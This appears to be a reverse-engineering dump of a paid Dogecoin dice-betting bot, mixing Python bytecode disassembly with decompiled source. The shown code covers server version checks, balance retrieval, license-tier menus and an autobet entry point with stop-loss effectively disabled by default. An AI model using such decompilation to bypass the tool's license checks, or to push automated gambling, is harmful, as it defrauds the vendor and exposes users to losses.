78 580 LOAD_NAME 56 (StopLoseBalance)
582 LOAD_CONST 36 ('0')
584 COMPARE_OP 2 (==)
586 EXTENDED_ARG 2
588 POP_JUMP_IF_TRUE 600
590 LOAD_NAME 56 (StopLoseBalance)
592 LOAD_CONST 0 (0)
594 COMPARE_OP 2 (==)
596 EXTENDED_ARG 2
598 POP_JUMP_IF_FALSE 606
79 >> 600 LOAD_CONST 59 (-999999999999999999999999999)
602 STORE_NAME 56 (StopLoseBalance)
604 JUMP_FORWARD 28 (to 634)
80 >> 606 LOAD_NAME 56 (StopLoseBalance)
608 LOAD_CONST 36 ('0')
610 COMPARE_OP 3 (!=)
612 EXTENDED_ARG 2
614 POP_JUMP_IF_TRUE 626
616 LOAD_NAME 56 (StopLoseBalance)
618 LOAD_CONST 0 (0)
620 COMPARE_OP 3 (!=)
622 EXTENDED_ARG 2
624 POP_JUMP_IF_FALSE 634
81 >> 626 LOAD_NAME 56 (StopLoseBalance)
628 LOAD_CONST 60 (-100000000)
630 BINARY_MULTIPLY
632 STORE_NAME 56 (StopLoseBalance)
82 >> 634 LOAD_CONST 61 ('doge')
636 STORE_NAME 59 (Currency)
84 638 LOAD_CONST 62 ('Offline')
640 STORE_GLOBAL 60 (statslogin)
85 642 LOAD_CONST 0 (0)
644 STORE_NAME 61 (limit)
# --- skip function ---
86 646 LOAD_CONST 63 (<code object withdraw at 0xa8bab020, file "<EzzKun>", line 86>)
648 LOAD_CONST 64 ('withdraw')
650 MAKE_FUNCTION 0
652 STORE_NAME 62 (withdraw)
107 654 LOAD_CONST 65 (<code object harga_license at 0xa8a88f28, file "<EzzKun>", line 107>)
656 LOAD_CONST 66 ('harga_license')
658 MAKE_FUNCTION 0
660 STORE_NAME 63 (harga_license)
121 662 LOAD_CONST 67 (<code object post at 0xa8a03020, file "<EzzKun>", line 121>)
664 LOAD_CONST 68 ('post')
666 MAKE_FUNCTION 0
668 STORE_NAME 64 (post)
125 670 LOAD_CONST 69 (<code object login at 0xa89fff90, file "<EzzKun>", line 125>)
672 LOAD_CONST 70 ('login')
674 MAKE_FUNCTION 0
676 STORE_NAME 65 (login)
171 678 LOAD_CONST 170 ((0,))
680 LOAD_CONST 71 (<code object autobet at 0xa89fff28, file "<EzzKun>", line 171>)
682 LOAD_CONST 72 ('autobet')
684 MAKE_FUNCTION 1 (defaults)
686 STORE_NAME 66 (autobet)
347 688 LOAD_CONST 73 (<code object ainfo at 0xa89ffec0, file "<EzzKun>", line 347>)
690 LOAD_CONST 74 ('ainfo')
692 MAKE_FUNCTION 0
694 STORE_NAME 67 (ainfo)
373 696 LOAD_CONST 75 (<code object verify at 0xa89ffe58, file "<EzzKun>", line 373>)
698 LOAD_CONST 76 ('verify')
700 MAKE_FUNCTION 0
702 STORE_NAME 68 (verify)
382 704 LOAD_CONST 77 (<code object register at 0xa89ffc50, file "<EzzKun>", line 382>)
706 LOAD_CONST 78 ('register')
708 MAKE_FUNCTION 0
710 STORE_NAME 69 (register)
434 712 LOAD_CONST 79 (<code object check_license at 0xa89ff9e0, file "<EzzKun>", line 434>)
714 LOAD_CONST 80 ('check_license')
716 MAKE_FUNCTION 0
718 STORE_NAME 70 (check_license)
482 720 LOAD_CONST 81 (<code object check_license_platinum at 0xa89ff8a8, file "<EzzKun>", line 482>)
722 LOAD_CONST 82 ('check_license_platinum')
724 MAKE_FUNCTION 0
726 STORE_NAME 71 (check_license_platinum)
522 728 LOAD_CONST 83 (<code object gblnc at 0xa89ff840, file "<EzzKun>", line 522>)
730 LOAD_CONST 84 ('gblnc')
732 MAKE_FUNCTION 0
734 STORE_NAME 72 (gblnc)
# --- all function i'am saved to file in dir ``object``
529 736 SETUP_FINALLY 86 (to 824)
530 738 LOAD_NAME 2 (os)
740 LOAD_METHOD 73 (system)
742 LOAD_CONST 85 ('clear')
744 CALL_METHOD 1
746 POP_TOP
531 748 LOAD_NAME 10 (scr)
750 LOAD_METHOD 74 (get)
752 LOAD_CONST 86 ('https://layscape.xyz/selenia/info.php')
754 CALL_METHOD 1
756 STORE_NAME 75 (srv)
532 758 LOAD_NAME 75 (srv)
760 LOAD_ATTR 76 (status_code)
762 STORE_NAME 77 (status)
533 764 LOAD_NAME 35 (print)
766 LOAD_CONST 87 ('Server Status Code [')
768 LOAD_NAME 77 (status)
770 LOAD_CONST 88 (']')
772 CALL_FUNCTION 3
774 POP_TOP
534 776 LOAD_NAME 77 (status)
778 LOAD_CONST 33 (200)
780 COMPARE_OP 2 (==)
782 EXTENDED_ARG 3
784 POP_JUMP_IF_FALSE 820
535 786 LOAD_NAME 35 (print)
788 LOAD_NAME 15 (hijau)
790 LOAD_CONST 89 ('Alive')
792 BINARY_ADD
794 LOAD_NAME 13 (putih)
796 BINARY_ADD
798 CALL_FUNCTION 1
800 POP_TOP
536 802 LOAD_NAME 75 (srv)
804 LOAD_METHOD 78 (json)
806 CALL_METHOD 0
808 STORE_NAME 79 (info)
537 810 LOAD_NAME 79 (info)
812 LOAD_CONST 90 ('versi')
814 BINARY_SUBSCR
816 STORE_NAME 80 (version)
818 JUMP_FORWARD 0 (to 820)
539 >> 820 POP_BLOCK
822 JUMP_FORWARD 86 (to 910)
540 >> 824 DUP_TOP
826 LOAD_NAME 81 (Exception)
828 COMPARE_OP 10 (exception match)
830 EXTENDED_ARG 3
832 POP_JUMP_IF_FALSE 908
834 POP_TOP
836 STORE_NAME 82 (e)
838 POP_TOP
840 SETUP_FINALLY 54 (to 896)
541 842 LOAD_NAME 35 (print)
844 LOAD_NAME 16 (merah)
846 LOAD_CONST 91 ('Server Down Try Again or Check Latest Version Script')
848 BINARY_ADD
850 LOAD_NAME 13 (putih)
852 BINARY_ADD
854 CALL_FUNCTION 1
856 POP_TOP
542 858 LOAD_NAME 35 (print)
860 LOAD_CONST 87 ('Server Status Code [')
862 LOAD_NAME 77 (status)
864 LOAD_CONST 88 (']')
866 CALL_FUNCTION 3
868 POP_TOP
543 870 LOAD_NAME 35 (print)
872 LOAD_NAME 16 (merah)
874 LOAD_CONST 92 ('ERROR CONNECTION TRY AGAIN')
876 LOAD_NAME 13 (putih)
878 BINARY_ADD
880 CALL_FUNCTION 2
882 POP_TOP
544 884 LOAD_NAME 1 (sys)
886 LOAD_METHOD 36 (exit)
888 CALL_METHOD 0
890 POP_TOP
892 POP_BLOCK
894 BEGIN_FINALLY
>> 896 LOAD_CONST 1 (None)
898 STORE_NAME 82 (e)
900 DELETE_NAME 82 (e)
902 END_FINALLY
904 POP_EXCEPT
906 JUMP_FORWARD 2 (to 910)
>> 908 END_FINALLY
if StopLoseBalance == '0' or StopLoseBalance == 0:
StopLoseBalance = -999999999999999999999999999
else:
if StopLoseBalance != '0' or (StopLoseBalance != 0):
StopLoseBalance = StopLoseBalance * -100000000
Currency = 'doge'
statslogin = 'Offline'
limit = 0
try:
os.system('clear')
srv = scr.get('https://layscape.xyz/selenia/info.php')
status = srv.status_code
print('Server Status Code [', status, ']')
if status == 200:
print(hijau + 'Alive' + putih)
info = srv.json()
version = info['versi']
else:
pass
except Exception as e:
try:
print(merah + 'Server Down Try Again or Check Latest Version Script' + putih)
print('Server Status Code [', status, ']')
print(merah, 'ERROR CONNECTION TRY AGAIN' + putih)
sys.exit()
finally:
e = None
del e
545 >> 910 LOAD_NAME 77 (status)
912 LOAD_CONST 33 (200)
914 COMPARE_OP 2 (==)
916 EXTENDED_ARG 8
918 POP_JUMP_IF_FALSE 2064
546 920 SETUP_FINALLY 36 (to 958)
547 922 LOAD_CONST 93 ('a=GetBalance&s=')
924 LOAD_GLOBAL 83 (ses)
926 BINARY_ADD
928 LOAD_CONST 94 ('&Currency=doge')
930 BINARY_ADD
932 STORE_NAME 84 (getbalance)
548 934 LOAD_NAME 64 (post)
936 LOAD_NAME 84 (getbalance)
938 CALL_FUNCTION 1
940 POP_TOP
549 942 LOAD_GLOBAL 85 (req)
944 LOAD_CONST 95 ('Balance')
946 BINARY_SUBSCR
948 LOAD_CONST 43 (100000000)
950 BINARY_TRUE_DIVIDE
952 STORE_GLOBAL 86 (dogebalance)
954 POP_BLOCK
956 JUMP_FORWARD 12 (to 970)
550 >> 958 POP_TOP
960 POP_TOP
962 POP_TOP
551 964 POP_EXCEPT
966 JUMP_FORWARD 2 (to 970)
968 END_FINALLY
552 >> 970 LOAD_NAME 3 (time)
972 LOAD_METHOD 87 (sleep)
974 LOAD_CONST 37 (1)
976 CALL_METHOD 1
978 POP_TOP
553 980 LOAD_NAME 2 (os)
982 LOAD_METHOD 73 (system)
984 LOAD_CONST 85 ('clear')
986 CALL_METHOD 1
988 POP_TOP
554 990 LOAD_NAME 35 (print)
992 LOAD_CONST 96 ('\x1b[1;31m====================================================\x1b[0m')
994 CALL_FUNCTION 1
996 POP_TOP
555 998 LOAD_NAME 35 (print)
1000 LOAD_CONST 97 ('\x1b[1;32m[+]\x1b[0m \x1b[0;36mDO WITH YOUR OWN RISK \x1b[0m \x1b[1;32m[+]\x1b[0m')
1002 CALL_FUNCTION 1
1004 POP_TOP
556 1006 LOAD_NAME 35 (print)
1008 LOAD_CONST 98 ('\x1b[1;32m[+]\x1b[0m \x1b[1;33mCreator : Layscape\x1b[0m \x1b[1;32m[+]\x1b[0m')
1010 CALL_FUNCTION 1
1012 POP_TOP
557 1014 LOAD_NAME 35 (print)
1016 LOAD_CONST 99 ('\x1b[1;32m[+]\x1b[0m \x1b[1;33mVersi Script V3.0\x1b[0m \x1b[1;32m[+]\x1b[0m')
1018 CALL_FUNCTION 1
1020 POP_TOP
558 1022 LOAD_NAME 35 (print)
1024 LOAD_CONST 100 ('\x1b[1;32m[+]\x1b[0m \x1b[1;33mJoin Group Whatsapp For News and Update\x1b[0m \x1b[1;32m[+]\x1b[0m')
1026 CALL_FUNCTION 1
1028 POP_TOP
559 1030 LOAD_NAME 35 (print)
1032 LOAD_CONST 96 ('\x1b[1;31m====================================================\x1b[0m')
1034 CALL_FUNCTION 1
1036 POP_TOP
560 1038 LOAD_NAME 35 (print)
1040 LOAD_CONST 101 ("Disclaimer : \nScript Not Working Don't Blame Creator :). \nRead/Watch How to Use As Well")
1042 CALL_FUNCTION 1
1044 POP_TOP
561 1046 LOAD_NAME 35 (print)
1048 LOAD_CONST 96 ('\x1b[1;31m====================================================\x1b[0m')
1050 CALL_FUNCTION 1
1052 POP_TOP
562 1054 LOAD_NAME 35 (print)
1056 LOAD_NAME 14 (kuning)
1058 LOAD_CONST 102 ('Info :')
1060 BINARY_ADD
1062 LOAD_NAME 79 (info)
1064 LOAD_CONST 103 ('notice5')
1066 BINARY_SUBSCR
1068 BINARY_ADD
1070 LOAD_NAME 13 (putih)
1072 BINARY_ADD
1074 CALL_FUNCTION 1
1076 POP_TOP
563 1078 LOAD_NAME 35 (print)
1080 LOAD_CONST 96 ('\x1b[1;31m====================================================\x1b[0m')
1082 CALL_FUNCTION 1
1084 POP_TOP
564 1086 LOAD_NAME 35 (print)
1088 LOAD_NAME 15 (hijau)
1090 LOAD_CONST 104 ('Information Script :')
1092 BINARY_ADD
1094 CALL_FUNCTION 1
1096 POP_TOP
565 1098 LOAD_NAME 35 (print)
1100 LOAD_CONST 105 ('Versi :')
1102 LOAD_NAME 79 (info)
1104 LOAD_CONST 90 ('versi')
1106 BINARY_SUBSCR
1108 CALL_FUNCTION 2
1110 POP_TOP
566 1112 LOAD_NAME 35 (print)
1114 LOAD_CONST 106 ('Creator :')
1116 LOAD_NAME 79 (info)
1118 LOAD_CONST 107 ('created')
1120 BINARY_SUBSCR
1122 CALL_FUNCTION 2
1124 POP_TOP
567 1126 LOAD_NAME 35 (print)
1128 LOAD_CONST 108 ('Youtube :')
1130 LOAD_NAME 79 (info)
1132 LOAD_CONST 109 ('youtube')
1134 BINARY_SUBSCR
1136 CALL_FUNCTION 2
1138 POP_TOP
568 1140 LOAD_NAME 35 (print)
1142 LOAD_CONST 110 ('Script :')
1144 LOAD_NAME 79 (info)
1146 LOAD_CONST 111 ('script')
1148 BINARY_SUBSCR
1150 LOAD_NAME 13 (putih)
1152 BINARY_ADD
1154 CALL_FUNCTION 2
1156 POP_TOP
569 1158 LOAD_CONST 112 ('3.0')
1160 LOAD_NAME 80 (version)
1162 COMPARE_OP 2 (==)
1164 EXTENDED_ARG 4
1166 POP_JUMP_IF_FALSE 1186 # this is if
570 1168 LOAD_NAME 35 (print)
1170 LOAD_NAME 15 (hijau)
1172 LOAD_CONST 113 ('New Version')
1174 BINARY_ADD
1176 LOAD_NAME 13 (putih)
1178 BINARY_ADD
1180 CALL_FUNCTION 1
1182 POP_TOP
1184 JUMP_FORWARD 74 (to 1260)
571 >> 1186 LOAD_NAME 80 (version)
1188 LOAD_CONST 112 ('3.0')
1190 COMPARE_OP 4 (>)
1192 EXTENDED_ARG 4
1194 POP_JUMP_IF_FALSE 1260 # this is elif
572 1196 LOAD_NAME 35 (print)
1198 LOAD_NAME 16 (merah)
1200 LOAD_CONST 114 ('New Version ')
1202 BINARY_ADD
1204 LOAD_NAME 80 (version)
1206 BINARY_ADD
1208 LOAD_CONST 115 (' Release')
1210 BINARY_ADD
1212 LOAD_NAME 13 (putih)
1214 BINARY_ADD
1216 CALL_FUNCTION 1
1218 POP_TOP
573 1220 LOAD_NAME 35 (print)
1222 LOAD_NAME 16 (merah)
1224 LOAD_CONST 116 ('Please Update')
1226 BINARY_ADD
1228 LOAD_NAME 13 (putih)
1230 BINARY_ADD
1232 CALL_FUNCTION 1
1234 POP_TOP
574 1236 LOAD_NAME 35 (print)
1238 LOAD_NAME 15 (hijau)
1240 LOAD_CONST 117 ('Type This Command:\n- git stash\n- git pull')
1242 BINARY_ADD
1244 LOAD_NAME 13 (putih)
1246 BINARY_ADD
1248 CALL_FUNCTION 1
1250 POP_TOP
575 1252 LOAD_NAME 1 (sys)
1254 LOAD_METHOD 36 (exit)
1256 CALL_METHOD 0
1258 POP_TOP
576 >> 1260 LOAD_NAME 35 (print)
1262 LOAD_NAME 14 (kuning)
1264 LOAD_CONST 118 ('Notice :\n')
1266 BINARY_ADD
1268 LOAD_NAME 79 (info)
1270 LOAD_CONST 119 ('notice1')
1272 BINARY_SUBSCR
1274 BINARY_ADD
1276 CALL_FUNCTION 1
1278 POP_TOP
577 1280 LOAD_NAME 35 (print)
1282 LOAD_NAME 79 (info)
1284 LOAD_CONST 120 ('notice2')
1286 BINARY_SUBSCR
1288 CALL_FUNCTION 1
1290 POP_TOP
578 1292 LOAD_NAME 35 (print)
1294 LOAD_NAME 79 (info)
1296 LOAD_CONST 121 ('notice3')
1298 BINARY_SUBSCR
1300 CALL_FUNCTION 1
1302 POP_TOP
579 1304 LOAD_NAME 35 (print)
1306 LOAD_NAME 79 (info)
1308 LOAD_CONST 122 ('notice4')
1310 BINARY_SUBSCR
1312 CALL_FUNCTION 1
1314 POP_TOP
580 1316 LOAD_NAME 35 (print)
1318 LOAD_CONST 123 ('- Attention to Your Connection')
1320 LOAD_NAME 13 (putih)
1322 BINARY_ADD
1324 CALL_FUNCTION 1
1326 POP_TOP
581 1328 LOAD_NAME 35 (print)
1330 LOAD_CONST 124 ('Buy License Here : \nhttps://layscape.xyz/selenia/license')
1332 CALL_FUNCTION 1
1334 POP_TOP
582 1336 LOAD_NAME 35 (print)
1338 LOAD_CONST 125 ('')
1340 CALL_FUNCTION 1
1342 POP_TOP
583 1344 LOAD_GLOBAL 60 (statslogin)
1346 LOAD_CONST 126 ('Online')
1348 COMPARE_OP 2 (==)
1350 EXTENDED_ARG 6
1352 POP_JUMP_IF_FALSE 1666
584 1354 LOAD_NAME 35 (print)
1356 LOAD_NAME 15 (hijau)
1358 LOAD_CONST 127 ('Re-Login for Refresh')
1360 BINARY_ADD
1362 LOAD_NAME 13 (putih)
1364 CALL_FUNCTION 2
1366 POP_TOP
if status == 200:
try:
getbalance = 'a=GetBalance&s=' + ses + '&Currency=doge'
post(getbalance)
dogebalance = req['Balance'] / 100000000
except:
pass
else:
time.sleep(1)
os.system('clear')
print('\x1b[1;31m====================================================\x1b[0m')
print('\x1b[1;32m[+]\x1b[0m \x1b[0;36mDO WITH YOUR OWN RISK \x1b[0m \x1b[1;32m[+]\x1b[0m')
print('\x1b[1;32m[+]\x1b[0m \x1b[1;33mCreator : Layscape\x1b[0m \x1b[1;32m[+]\x1b[0m')
print('\x1b[1;32m[+]\x1b[0m \x1b[1;33mVersi Script V3.0\x1b[0m \x1b[1;32m[+]\x1b[0m')
print('\x1b[1;32m[+]\x1b[0m \x1b[1;33mJoin Group Whatsapp For News and Update\x1b[0m \x1b[1;32m[+]\x1b[0m')
print('\x1b[1;31m====================================================\x1b[0m')
print("Disclaimer : \nScript Not Working Don't Blame Creator :). \nRead/Watch How to Use As Well")
print('\x1b[1;31m====================================================\x1b[0m')
print(kuning + 'Info :' + info['notice5'] + putih)
print('\x1b[1;31m====================================================\x1b[0m')
print(hijau + 'Information Script :')
print('Versi :', info['versi'])
print('Creator :', info['created'])
print('Youtube :', info['youtube'])
print('Script :', info['script'] + putih)
if '3.0' == version:
print(hijau + 'New Version' + putih)
elif version > '3.0': # -> float required not str
print(merah + 'New Version ' + version + ' Release' + putih)
print(merah + 'Please Update' + putih)
print(hijau + 'Type This Command:\n- git stash\n- git pull' + putih)
sys.exit()
print(kuning + 'Notice :\n' + info['notice1'])
print(info['notice2'])
print(info['notice3'])
print(info['notice4'])
print('- Attention to Your Connection' + putih)
print('Buy License Here : \nhttps://layscape.xyz/selenia/license')
print('')
if statslogin == 'Online':
print(hijau + 'Re-Login for Refresh', putih)
else:
pass
585 1368 SETUP_FINALLY 56 (to 1426)
586 1370 LOAD_GLOBAL 88 (Expired)
1372 LOAD_CONST 0 (0)
1374 COMPARE_OP 1 (<=)
1376 EXTENDED_ARG 5
1378 POP_JUMP_IF_FALSE 1422
587 1380 LOAD_NAME 35 (print)
1382 LOAD_NAME 16 (merah)
1384 LOAD_CONST 128 ('License Out of Date')
1386 BINARY_ADD
1388 LOAD_NAME 13 (putih)
1390 BINARY_ADD
1392 CALL_FUNCTION 1
1394 POP_TOP
588 1396 LOAD_NAME 35 (print)
1398 LOAD_NAME 14 (kuning)
1400 LOAD_CONST 129 ('Buy New One')
1402 BINARY_ADD
1404 LOAD_NAME 13 (putih)
1406 BINARY_ADD
1408 CALL_FUNCTION 1
1410 POP_TOP
589 1412 LOAD_NAME 1 (sys)
1414 LOAD_METHOD 36 (exit)
1416 CALL_METHOD 0
1418 POP_TOP
1420 JUMP_FORWARD 0 (to 1422)
591 >> 1422 POP_BLOCK
1424 JUMP_FORWARD 12 (to 1438)
592 >> 1426 POP_TOP
1428 POP_TOP
1430 POP_TOP
593 1432 POP_EXCEPT
1434 JUMP_FORWARD 2 (to 1438)
1436 END_FINALLY
594 >> 1438 LOAD_NAME 35 (print)
1440 LOAD_CONST 130 ('Informasi Status Login :')
1442 LOAD_NAME 15 (hijau)
1444 LOAD_GLOBAL 60 (statslogin)
1446 BINARY_ADD
1448 LOAD_NAME 13 (putih)
1450 BINARY_ADD
1452 CALL_FUNCTION 2
1454 POP_TOP
595 1456 LOAD_NAME 35 (print)
1458 LOAD_CONST 131 ('Account ID :')
1460 LOAD_GLOBAL 89 (accid)
1462 CALL_FUNCTION 2
1464 POP_TOP
596 1466 LOAD_NAME 35 (print)
1468 LOAD_CONST 132 ('Username :')
1470 LOAD_NAME 25 (Username)
1472 CALL_FUNCTION 2
1474 POP_TOP
597 1476 LOAD_NAME 35 (print)
1478 LOAD_CONST 133 ('Doge Balance :')
1480 LOAD_NAME 22 (num_format)
1482 LOAD_GLOBAL 86 (dogebalance)
1484 CALL_FUNCTION 1
1486 CALL_FUNCTION 2
1488 POP_TOP
598 1490 LOAD_NAME 35 (print)
1492 LOAD_CONST 134 ('Doge Deposit Wallet :')
1494 LOAD_GLOBAL 90 (dogewallet)
1496 CALL_FUNCTION 2
1498 POP_TOP
599 1500 LOAD_NAME 35 (print)
1502 LOAD_CONST 135 ('License Type : ')
1504 LOAD_NAME 91 (logintype)
1506 CALL_FUNCTION 2
1508 POP_TOP
600 1510 LOAD_NAME 91 (logintype)
1512 LOAD_CONST 136 ('Free License')
1514 COMPARE_OP 2 (==)
1516 EXTENDED_ARG 6
1518 POP_JUMP_IF_FALSE 1560
601 1520 LOAD_CONST 62 ('Offline')
1522 STORE_GLOBAL 92 (statssrv)
602 1524 LOAD_NAME 35 (print)
1526 LOAD_CONST 137 ('Expired Date : None')
1528 CALL_FUNCTION 1
1530 POP_TOP
603 1532 LOAD_NAME 35 (print)
1534 LOAD_CONST 138 ('SG Server Status :')
1536 LOAD_NAME 16 (merah)
1538 LOAD_GLOBAL 92 (statssrv)
1540 BINARY_ADD
1542 LOAD_NAME 13 (putih)
1544 BINARY_ADD
1546 CALL_FUNCTION 2
1548 POP_TOP
604 1550 LOAD_NAME 35 (print)
1552 LOAD_CONST 139 ('Max Balance : 150 DOGE')
1554 CALL_FUNCTION 1
1556 POP_TOP
1558 JUMP_FORWARD 96 (to 1656)
605 >> 1560 LOAD_NAME 91 (logintype)
1562 LOAD_CONST 140 ('Premium License')
1564 COMPARE_OP 2 (==)
1566 EXTENDED_ARG 6
1568 POP_JUMP_IF_TRUE 1580
1570 LOAD_NAME 91 (logintype)
1572 LOAD_CONST 141 ('Platinum License')
1574 COMPARE_OP 2 (==)
1576 EXTENDED_ARG 6
1578 POP_JUMP_IF_FALSE 1656
606 >> 1580 LOAD_CONST 126 ('Online')
1582 STORE_GLOBAL 92 (statssrv)
607 1584 LOAD_NAME 6 (datetime)
1586 LOAD_METHOD 93 (now)
1588 CALL_METHOD 0
1590 STORE_NAME 94 (mydatetime)
608 1592 LOAD_NAME 35 (print)
1594 LOAD_CONST 138 ('SG Server Status :')
1596 LOAD_NAME 15 (hijau)
1598 LOAD_GLOBAL 92 (statssrv)
1600 BINARY_ADD
1602 LOAD_NAME 13 (putih)
1604 BINARY_ADD
1606 CALL_FUNCTION 2
1608 POP_TOP
609 1610 LOAD_NAME 35 (print)
1612 LOAD_CONST 142 ('Date :')
1614 LOAD_NAME 94 (mydatetime)
1616 LOAD_METHOD 95 (strftime)
1618 LOAD_CONST 143 ('%Y-%m-%d')
1620 CALL_METHOD 1
1622 CALL_FUNCTION 2
1624 POP_TOP
610 1626 LOAD_NAME 35 (print)
1628 LOAD_CONST 144 ('Expired Date :')
1630 LOAD_GLOBAL 96 (userdate)
1632 CALL_FUNCTION 2
1634 POP_TOP
611 1636 LOAD_NAME 35 (print)
1638 LOAD_CONST 145 ('Expired In :')
1640 LOAD_GLOBAL 88 (Expired)
1642 LOAD_CONST 146 ('Days')
1644 CALL_FUNCTION 3
1646 POP_TOP
612 1648 LOAD_NAME 35 (print)
1650 LOAD_CONST 147 ('Max Balance : Unlimited')
1652 CALL_FUNCTION 1
1654 POP_TOP
613 >> 1656 LOAD_NAME 35 (print)
1658 LOAD_CONST 148 ('Currency Available : DOGE')
1660 CALL_FUNCTION 1
1662 POP_TOP
1664 JUMP_FORWARD 10 (to 1676)
615 >> 1666 LOAD_NAME 35 (print)
1668 LOAD_CONST 149 ('Information Status Login :')
1670 LOAD_GLOBAL 60 (statslogin)
1672 CALL_FUNCTION 2
1674 POP_TOP
617 >> 1676 LOAD_NAME 35 (print)
1678 LOAD_NAME 15 (hijau)
1680 LOAD_CONST 150 ('\nPilih Menu :')
1682 BINARY_ADD
1684 CALL_FUNCTION 1
1686 POP_TOP
618 1688 LOAD_NAME 35 (print)
1690 LOAD_NAME 14 (kuning)
1692 LOAD_CONST 151 ('1. Login Premium License')
1694 BINARY_ADD
1696 CALL_FUNCTION 1
1698 POP_TOP
619 1700 LOAD_NAME 35 (print)
1702 LOAD_CONST 152 ('2. Login For Free')
1704 CALL_FUNCTION 1
1706 POP_TOP
620 1708 LOAD_NAME 35 (print)
1710 LOAD_CONST 153 ('3. Login Platinum License')
1712 CALL_FUNCTION 1
1714 POP_TOP
621 1716 LOAD_NAME 35 (print)
1718 LOAD_CONST 154 ('4. Register Account SELENIA')
1720 CALL_FUNCTION 1
1722 POP_TOP
622 1724 LOAD_NAME 35 (print)
1726 LOAD_CONST 155 ('5. Price List License')
1728 CALL_FUNCTION 1
1730 POP_TOP
623 1732 LOAD_NAME 35 (print)
1734 LOAD_CONST 156 ('0. Keluar')
1736 CALL_FUNCTION 1
1738 POP_TOP
624 1740 LOAD_GLOBAL 60 (statslogin)
1742 LOAD_CONST 126 ('Online')
1744 COMPARE_OP 2 (==)
1746 EXTENDED_ARG 6
1748 POP_JUMP_IF_FALSE 1774
625 1750 LOAD_NAME 35 (print)
1752 LOAD_CONST 157 ('6. Start Trade')
1754 CALL_FUNCTION 1
1756 POP_TOP
626 1758 LOAD_NAME 35 (print)
1760 LOAD_CONST 158 ('7. Withdraw')
1762 CALL_FUNCTION 1
1764 POP_TOP
627 1766 LOAD_NAME 35 (print)
1768 LOAD_CONST 159 ('8. Account Information')
1770 CALL_FUNCTION 1
1772 POP_TOP
629 >> 1774 LOAD_NAME 97 (input)
1776 LOAD_CONST 160 ('==>')
1778 CALL_FUNCTION 1
1780 STORE_NAME 98 (smenu)
630 1782 LOAD_NAME 98 (smenu)
1784 LOAD_CONST 161 ('1')
1786 COMPARE_OP 2 (==)
1788 EXTENDED_ARG 7
1790 POP_JUMP_IF_FALSE 1820
631 1792 LOAD_CONST 0 (0)
1794 STORE_NAME 61 (limit)
632 1796 LOAD_CONST 140 ('Premium License')
1798 STORE_NAME 91 (logintype)
633 1800 LOAD_NAME 65 (login)
1802 CALL_FUNCTION 0
1804 POP_TOP
634 1806 LOAD_NAME 68 (verify)
1808 CALL_FUNCTION 0
1810 POP_TOP
635 1812 LOAD_NAME 70 (check_license)
1814 CALL_FUNCTION 0
1816 POP_TOP
1818 JUMP_FORWARD 30 (to 1850)
636 >> 1820 LOAD_NAME 98 (smenu)
1822 LOAD_CONST 162 ('2')
1824 COMPARE_OP 2 (==)
1826 EXTENDED_ARG 7
1828 POP_JUMP_IF_FALSE 1850
637 1830 LOAD_CONST 136 ('Free License')
1832 STORE_NAME 91 (logintype)
638 1834 LOAD_NAME 65 (login)
1836 CALL_FUNCTION 0
1838 POP_TOP
639 1840 LOAD_GLOBAL 86 (dogebalance)
1842 STORE_NAME 61 (limit)
640 1844 LOAD_NAME 68 (verify)
1846 CALL_FUNCTION 0
1848 POP_TOP
641 >> 1850 LOAD_NAME 98 (smenu)
1852 LOAD_CONST 163 ('3')
1854 COMPARE_OP 2 (==)
1856 EXTENDED_ARG 7
1858 POP_JUMP_IF_FALSE 1888
642 1860 LOAD_CONST 0 (0)
1862 STORE_NAME 61 (limit)
643 1864 LOAD_CONST 141 ('Platinum License')
1866 STORE_NAME 91 (logintype)
644 1868 LOAD_NAME 65 (login)
1870 CALL_FUNCTION 0
1872 POP_TOP
645 1874 LOAD_NAME 68 (verify)
1876 CALL_FUNCTION 0
1878 POP_TOP
646 1880 LOAD_NAME 71 (check_license_platinum)
1882 CALL_FUNCTION 0
1884 POP_TOP
1886 JUMP_FORWARD 172 (to 2060)
647 >> 1888 LOAD_NAME 98 (smenu)
1890 LOAD_CONST 164 ('4')
1892 COMPARE_OP 2 (==)
1894 EXTENDED_ARG 7
1896 POP_JUMP_IF_FALSE 1906
648 1898 LOAD_NAME 69 (register)
1900 CALL_FUNCTION 0
1902 POP_TOP
1904 JUMP_FORWARD 154 (to 2060)
649 >> 1906 LOAD_NAME 98 (smenu)
1908 LOAD_CONST 165 ('6')
1910 COMPARE_OP 2 (==)
1912 EXTENDED_ARG 7
1914 POP_JUMP_IF_FALSE 1958
1916 LOAD_GLOBAL 60 (statslogin)
1918 LOAD_CONST 126 ('Online')
1920 COMPARE_OP 2 (==)
1922 EXTENDED_ARG 7
1924 POP_JUMP_IF_FALSE 1958
650 1926 LOAD_NAME 91 (logintype)
1928 LOAD_CONST 136 ('Free License')
1930 COMPARE_OP 2 (==)
1932 EXTENDED_ARG 7
1934 POP_JUMP_IF_FALSE 1948
651 1936 LOAD_NAME 72 (gblnc)
1938 CALL_FUNCTION 0
1940 POP_TOP
652 1942 LOAD_GLOBAL 86 (dogebalance)
1944 STORE_NAME 61 (limit)
1946 JUMP_FORWARD 0 (to 1948)
655 >> 1948 LOAD_NAME 66 (autobet)
1950 LOAD_NAME 61 (limit)
1952 CALL_FUNCTION 1
1954 POP_TOP
1956 JUMP_FORWARD 102 (to 2060)
656 >> 1958 LOAD_NAME 98 (smenu)
1960 LOAD_CONST 166 ('5')
1962 COMPARE_OP 2 (==)
1964 EXTENDED_ARG 7
1966 POP_JUMP_IF_FALSE 1976
657 1968 LOAD_NAME 63 (harga_license)
1970 CALL_FUNCTION 0
1972 POP_TOP
1974 JUMP_FORWARD 84 (to 2060)
658 >> 1976 LOAD_NAME 98 (smenu)
1978 LOAD_CONST 167 ('7')
1980 COMPARE_OP 2 (==)
1982 EXTENDED_ARG 7
1984 POP_JUMP_IF_FALSE 2004
1986 LOAD_GLOBAL 60 (statslogin)
1988 LOAD_CONST 126 ('Online')
1990 COMPARE_OP 2 (==)
1992 EXTENDED_ARG 7
1994 POP_JUMP_IF_FALSE 2004
659 1996 LOAD_NAME 62 (withdraw)
1998 CALL_FUNCTION 0
2000 POP_TOP
2002 JUMP_FORWARD 56 (to 2060)
660 >> 2004 LOAD_NAME 98 (smenu)
2006 LOAD_CONST 168 ('8')
2008 COMPARE_OP 2 (==)
2010 EXTENDED_ARG 7
2012 POP_JUMP_IF_FALSE 2032
2014 LOAD_GLOBAL 60 (statslogin)
2016 LOAD_CONST 126 ('Online')
2018 COMPARE_OP 2 (==)
2020 EXTENDED_ARG 7
2022 POP_JUMP_IF_FALSE 2032
661 2024 LOAD_NAME 67 (ainfo)
2026 CALL_FUNCTION 0
2028 POP_TOP
